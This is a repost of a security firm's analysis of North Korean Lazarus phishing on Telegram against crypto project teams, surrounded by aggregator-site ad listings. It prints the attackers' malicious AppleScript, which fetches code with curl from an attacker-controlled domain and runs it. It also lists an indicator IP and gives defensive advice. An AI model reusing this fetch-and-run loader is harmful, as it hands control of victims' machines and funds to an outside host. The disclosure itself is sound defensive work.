朝鲜黑客 Telegram 定点欺诈攻击分析_全球资讯热分享网(专注热点收集平台)

朝鲜黑客 Telegram 定点欺诈攻击分析


朝鲜黑客 Telegram 定点欺诈攻击分析

  2023-12-07 23:15:08     简体|繁體
https://refenxiang.com/1014009.html

背景

早在 2022 年,慢雾安全团队就通过慢雾 BTI 情报网络发现朝鲜黑客 Lazarus 团伙开启针对加密货币行业的大规模 Telegram 欺诈钓鱼行动,近期朝鲜黑客更是开始冒充知名投资机构,对项目方进行欺诈钓鱼,鉴于影响范围较大,慢雾在此进行分析。

技战法

一、挑选知名投资机构作为冒充对象,然后建立虚假的 Telegram 帐号:

二、寻找知名的 DeFi 项目方作为目标,以要投资他们为名,使用虚假帐号开始实施骗局:

朝鲜黑客会先对目标发起聊天以建立联系,如果项目方看到消息且安全意识不足,就会出现下图的一幕:

朝鲜黑客骗取项目方的信任后便开始约会议,此处有两种攻击手法:

1. 邀请项目方加入如 ***.group-meeting.team 之类的会议,假装询问对方是否有时间安排会面或详谈,并主动提供恶意会议链接。项目方点击链接后会看到地区访问限制,这时朝鲜黑客会接着诱使项目方下载并运行其提供的“修改定位”的恶意脚本。一旦项目方照做,那么他的电脑就会被朝鲜黑客控制,导致资金被盗取。下面是恶意脚本 IP_Request.scpt 的内容:

set fix_url to "https://support.group-meeting.online/778188/request-for-troubleshooting"

set sc to do shell script "curl -L -k""& fix_url &"/""

run script sc

代码解释:

2. 利用 Calendly 会议预定系统的“添加自定义链接”在事件页面的功能,在事件上插入恶意链接发起钓鱼攻击。由于 Calendly 与大多数项目方的日常工作背景很好地融合在一起,因此这些恶意链接不容易引起怀疑,项目方容易无意中点击恶意链接,下载并执行恶意代码,此时朝鲜黑客同样可以获取到项目方系统相关信息或权限。

慢雾安全团队在 2023 年 11 月 30 日 也对相关攻击手法做过提醒:

基础 IOC:

IP: 104.168.137.21

Domains:

恶意攻击样例:

总结

鉴于此类诈骗行为仍在持续发生,建议 Web3 用户务必确保在添加好友时通过双重渠道确认对方的真实性,同时对 Telegram 开启双重身份验证(2FA),随时注意交易安全,以免遭受资金损失。

一旦不慎运行相关木马,请第一时间转移相关资金、断网杀毒,同时修改目标电脑上(包括浏览器里记录的)相关账号密码等信息。



编辑:web3528btc 来源:加密钱包代币

分享到:

  • 上一篇
    下一篇

  • 分享知识|收获智慧

    全球资讯热分享网(专注热点收集平台)
    手机查看(二维码扫一扫)

    全球资讯热分享网,最有影响力热点信息分类网站,主要集合图文、知识、日常、娱乐、财经、文化、生活、致富、女性、地区、科技等多类信息分享交流,免费提供最有价值的头条信息平台。
    « 2024年 » « 11月 »
    123
    45678910
    11121314151617
    18192021222324
    252627282930

    最新资讯

    [开户]祛斑,眼袋,减肥,三高,心脑,腰突,眼病,海参,奶粉,肝病,疝气等大健康四品一械加粉
  • 2024-11-25 09:46:08

     

    [开户]百度(baidu)电商政策60+ cid68+,行发食品功效一跳高收量,千川对私3.5+-+
  • 2024-11-25 09:41:03

     

    [开户]-全部一代-抖音、快手、小红书、神马(sm)UC,美团代运营、全平台开户投放代运营,视频拍摄
  • 2024-11-25 09:35:59

     

    交银财富卫士1号终身寿险2.0值得买吗?从这两个方面来看
  • 2024-11-25 09:30:54

     

    [开户]​快手企业贷腾讯企业贷百度(baidu)企业贷户
  • 2024-11-25 09:25:50

     

    [开户]百度(baidu)抖音,疱疹,鼻炎,肩周炎各类小病种
  • 2024-11-25 09:20:45

     

    [开户]oppo信息流,百病食疗书籍免领,成本25左右,注册率45+,需要来
  • 2024-11-25 09:15:41

     

    [开户]磁力金牛12(新开26)cid21
  • 2024-11-25 09:10:37

     

    [开户]360(haosou) 搜索,信息流 高点收量
  • 2024-11-25 09:05:33

     

    [开户]快应用 工具类等 缺量老板来 日耗10w+ 来聊WiFi 优酷
  • 2024-11-25 09:00:28

     

    [开户]抖音男科截流粉
  • 2024-11-25 08:55:23

     

    [开户]快手中医,体检, 男科,ai培训,莆田鞋,个债,逾期,电工证(表单 咨询跳企业微信)
  • 2024-11-25 08:50:20

     

    [开户]小红书精准包包粉
  • 2024-11-25 08:45:16

     

    [开户]广告开户,接APP拉新,快应用短剧 小说 工具,小程序拉新UV,代运营效果服务
  • 2024-11-25 08:40:12

     

    [开户]出食疗 中医 图书 艾草 JF 祛痘 祛斑 淘宝客 短剧 流量卡
  • 2024-11-25 08:35:08